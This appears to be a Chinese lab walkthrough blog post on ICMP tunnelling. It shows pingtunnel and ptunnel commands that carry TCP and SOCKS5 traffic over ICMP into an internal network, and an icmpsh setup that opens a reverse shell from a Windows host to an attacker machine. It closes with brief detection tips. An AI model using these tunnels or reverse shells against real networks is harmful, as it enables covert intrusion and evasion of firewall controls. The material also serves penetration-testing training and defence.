


1 Pingtunnel 代理转发

1.1 Pingtunnel 代理原理

pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具

pingtunnel.exe -h

    By forging ping, the tcp/udp/sock5 traffic is forwarded to the destination server through the remote server. Used to break certain operators to block TCP/UDP traffic.


    // server
    pingtunnel -type server

    // client, Forward udp
    pingtunnel -type client -l LOCAL_IP:4455 -s SERVER_IP -t SERVER_IP:4455

    // client, Forward tcp
    pingtunnel -type client -l LOCAL_IP:4455 -s SERVER_IP -t SERVER_IP:4455 -tcp 1

    // client, Forward sock5, implicitly open tcp, so no target server is needed
    pingtunnel -type client -l LOCAL_IP:4455 -s SERVER_IP -sock5 1

    -type     服务器或者客户端
              client or server

服务器参数server param:

    -key      设置的密码,默认0
              Set password, default 0

    -nolog    不写日志文件,只打印标准输出,默认0
              Do not write log files, only print standard output, default 0 is off

    -noprint  不打印屏幕输出,默认0
              Do not print standard output, default 0 is off

    -loglevel 日志文件等级,默认info
              log level, default is info

    -maxconn  最大连接数,默认0,不受限制
              the max num of connections, default 0 is no limit

    -maxprt   server最大处理线程数,默认100
              max process thread in server, default 100

    -maxprb   server最大处理线程buffer数,默认1000
              max process thread's buffer in server, default 1000

    -conntt   server发起连接到目标地址的超时时间,默认1000ms
              The timeout period for the server to initiate a connection to the destination address. The default is 1000ms.

客户端参数client param:

    -l        本地的地址,发到这个端口的流量将转发到服务器
              Local address, traffic sent to this port will be forwarded to the server

    -s        服务器的地址,流量将通过隧道转发到这个服务器
              The address of the server, the traffic will be forwarded to this server through the tunnel

    -t        远端服务器转发的目的地址,流量将转发到这个地址
              Destination address forwarded by the remote server, traffic will be forwarded to this address

    -timeout  本地记录连接超时的时间,单位是秒,默认60s
              The time when the local record connection timed out, in seconds, 60 seconds by default

    -key      设置的密码,默认0
              Set password, default 0

    -tcp      设置是否转发tcp,默认0
              Set the switch to forward tcp, the default is 0

    -tcp_bs   tcp的发送接收缓冲区大小,默认1MB
              Tcp send and receive buffer size, default 1MB

    -tcp_mw   tcp的最大窗口,默认20000
              The maximum window of tcp, the default is 20000

    -tcp_rst  tcp的超时发送时间,默认400ms
              Tcp timeout resend time, default 400ms

    -tcp_gz   当数据包超过这个大小,tcp将压缩数据,0表示不压缩,默认0
              Tcp will compress data when the packet exceeds this size, 0 means no compression, default 0

    -tcp_stat 打印tcp的监控,默认0
              Print tcp connection statistic, default 0 is off

    -nolog    不写日志文件,只打印标准输出,默认0
              Do not write log files, only print standard output, default 0 is off

    -noprint  不打印屏幕输出,默认0
              Do not print standard output, default 0 is off

    -loglevel 日志文件等级,默认info
              log level, default is info

    -sock5    开启sock5转发,默认0
              Turn on sock5 forwarding, default 0 is off

    -profile  在指定端口开启性能检测,默认0不开启
              Enable performance detection on the specified port. The default 0 is not enabled.

    -s5filter sock5模式设置转发过滤,默认全转发,设置CN代表CN地区的直连不转发
              Set the forwarding filter in the sock5 mode. The default is full forwarding. For example, setting the CN indicates that the Chinese address is not forwarded.

    -s5ftfile sock5模式转发过滤的数据文件,默认读取当前目录的GeoLite2-Country.mmdb
              The data file in sock5 filter mode, the default reading of the current directory GeoLite2-Country.mmdb

1.2 实验环境


1.3 配置服务端:Bulldog

unzip pingtunnel_linux_amd64.zip
sudo ./pingtunnel -type server
  • (可选)关闭系统默认的 ping
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all

1.4 配置客户端:kali

  1. 配置 Sock5 转发

    pingtunnel.sh -type client -l :1080 -s -sock5 1


  2. 配置ProxyChains

    # vim /etc/proxychains4.conf
    socks5 1080
  3. 恶意用户远程请求内网服务器 bulldog

    proxychains firefox


  4. 抓包查看流量特征


1.5 其他相似的代理工具

  1. utoni/ptunnel-ng: Tunnel TCP connections through ICMP. (github.com)
  2. f1vefour/ptunnel: Ping Tunnel (github.com)

2 Ptunnel 代理转发

项目地址:Ping Tunnel - Send TCP traffic over ICMP (uit.no)

2.1 Ptunnel 原理

ptunnel 是把 tcp 流量伪装成 icmp 流量进行转发的工具

# 客户端:
./ptunnel -p <proxy address> -lp <listen port> -da <destination address> -dp <destination port> [-c <network device>] [-v <verbosity>] [-f <logfile>] [-u] [-x password]

# 代理端:
./ptunnel [-c <network device>] [-v <verbosity>] [-f <logfile>] [-u] [-x password]

  • -p: 指定服务器端IP地址
  • -lp: 侦听本地端口
  • -da: 访问目标的IP地址
  • -dp: 访问目标的端口
  • -x: 连接密码

2.2 实验环境


2.3 利用过程

  1. 实现:kali通过win10上,ICMP代理访问内网CentOS

  2. kali客户端配置

    ptunnel -p -lp 8080 -da -dp 8080 -v 4 -x 1234
  3. Win10服务端配置

    ptunnel -v 4 -x 1234
  4. kali下访问内网CentOS的8080端口服务

    curl http://localhost:8080

3 icmpsh ICMP反弹shell

  1. 项目地址:bdamele/icmpsh: Simple reverse ICMP shell (github.com)
  2. 参考:Command and Control – ICMP – Penetration Testing Lab (pentestlab.blog)

3.1 icmpsh 原理


3.2 实验环境


  • Evil为CentOS主机。

  • icmpsh需要在Python2.7环境下运行

    Install Pip on CentOS 7 with Curl and Python
    # 下载pip安装脚本
    # pip3
    curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py"
    # pip2.7,要安装的是这个
    curl "https://bootstrap.pypa.io/pip/2.7/get-pip.py" -o "get-pip.py"
    # 安装pip
    sudo python get-pip.py
    # 查看pip版本
    pip -V
    # icmpsh安装所需组件
    pip2.7 install impacket -i https://pypi.douban.com/simple

3.3 利用过程

  1. Evil上关闭ICMP回显

    sysctl -w net.ipv4.icmp_echo_ignore_all=1
    • 如果不关闭,会导致以下情况:


  2. 启动一个监听器,该监听器将等待目标主机的ICMP数据包:

    python2.7 icmpsh_m.py
  3. 在Win10上反弹SHELL

    icmpsh.exe -t
  4. 成功反弹


4 防御 ICMP 隧道攻击的方法

  1. 检测同一来源的 ICMP 数据包的数量,tcp/udp/sock5 流量伪装成 ICMP 流量会在很短的时间内产生上千个 ICMP 数据包。
  2. 注意那些 Payload 大于 64bit 的 ICMP 数据包。
  3. 寻找响应数据包中的 Payload 与请求数据包中的 Payload 不一致的 ICMP 数据包。
posted @ 2022-08-20 14:17  f_carey  阅读(293)  评论(0编辑  收藏  举报